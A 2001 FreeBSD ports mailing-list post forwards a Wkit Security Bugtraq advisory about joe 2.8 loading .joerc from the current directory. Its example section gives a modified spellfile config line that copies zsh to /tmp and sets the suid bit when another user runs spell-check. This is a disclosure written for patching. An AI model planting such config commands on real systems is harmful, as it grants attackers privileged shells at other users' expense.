From owner-freebsd-ports Wed Feb 28 9: 5:10 2001 Delivered-To: freebsd-ports@freebsd.org Received: from temphost.dragondata.com (temphost.dragondata.com [63.167.131.128]) by hub.freebsd.org (Postfix) with ESMTP id 391AD37B71B for ; Wed, 28 Feb 2001 09:05:04 -0800 (PST) (envelope-from toasty@temphost.dragondata.com) Received: (from toasty@localhost) by temphost.dragondata.com (8.9.3/8.9.3) id LAA78614 for ports@freebsd.org; Wed, 28 Feb 2001 11:05:53 -0600 (CST) (envelope-from toasty) From: Kevin Day Message-Id: <200102281705.LAA78614@temphost.dragondata.com> Subject: Joe's Own Editor File Handling Error (fwd) To: ports@freebsd.org Date: Wed, 28 Feb 2001 11:05:53 -0600 (CST) X-Mailer: ELM [version 2.5 PL3] MIME-Version: 1.0 Content-Type: text/plain; charset=DISPLAY Content-Transfer-Encoding: 8bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm working on a patch for this right now, don't FORDBID the port yet. :) -- Kevin Forwarded message: > From owner-bugtraq@SECURITYFOCUS.COM Wed Feb 28 10:54:24 2001 > Approved-By: beng@SECURITYFOCUS.COM > Delivered-To: bugtraq@lists.securityfocus.com > Delivered-To: bugtraq@securityfocus.com > X-Mailer: Lotus Notes Release 5.0.6a January 17, 2001 > X-MIMETrack: Serialize by Router on tracy/Wkit(Release 5.0.4a |July 24, > 2000) at 2001-02-28 15:13:46 > MIME-Version: 1.0 > Content-type: text/plain; charset=iso-8859-1 > Message-ID: > Date: Wed, 28 Feb 2001 15:13:42 +0100 > Reply-To: advisories@WKIT.COM > Sender: Bugtraq List > From: advisories@WKIT.COM > Subject: Joe's Own Editor File Handling Error > X-To: submissions@packetstorm.security.com > To: BUGTRAQ@SECURITYFOCUS.COM > Content-Transfer-Encoding: 8bit > X-MIME-Autoconverted: from quoted-printable to 8bit by temphost.dragondata.com id KAA77924 > > WKIT SECURITY AB > www.wkit.com > > > TITLE: Joe's Own Editor File Handling Error > ADVISORY ID: WSIR-01/02-02 > REFERENCE: http://www.wkit.com/advisories > CVE: GENERIC-MAP-NOMATCH > CREDIT: Christer Öberg, Wkit Security AB > CONTACT: advisories@wkit.com > CLASS: File Handling Error > OBJECT: joe(1) (exec) > VENDOR: Josef H. Allen > STATUS: > REMOTE: No > LOCAL: Yes > VULNERABLE: Joseph Allen joe 2.8 > > DATE > CREATED: 26/02/2001 > LAST UPDATED: > VENDOR CONTACT: > RELEASE: 28/02/2001 > > VULNERABILITY DESCRIPTION > joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and > /usr/local/lib/joerc in that order. Users could be tricked into execute > commands if they open/edit a file with joe in a directory where other > users can write. > > CONDITIONS > User using joe in a world/group writable directory. > > EXAMPLE > A user copy the default joerc file to a world writable directory and > change > :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype > to > :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod > 4755 /tmp/suid",rtn,retype > Another user opens a file in that directory with joe and run ispell with > ^[l the result is a suid shell in /tmp > > SOLUTION/VENDOR INFORMATION/WORKAROUND > > DISCLAIMER > The contents of this advisory may be distributed freely, provided that > no fee is charged and proper credit is given. Wkit Security AB takes > no credit for this discovery if someone else has published this > information in the public domain before this advisory was released. > The information herein is intended for educational purposes, not for > malicious use. Wkit Security AB takes no responsibility whatsoever for > the > use of this information. > > ABOUT > Wkit Security AB is an independent data security company working with > security-related services and products. > > Wkit Security AB > Upperudsv. 4 > S-464 72 Håverud > SWEDEN > http://www.wkit.com > e-mail: advisories@wkit.com > > (C) 2001 WKIT SECURITY AB > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message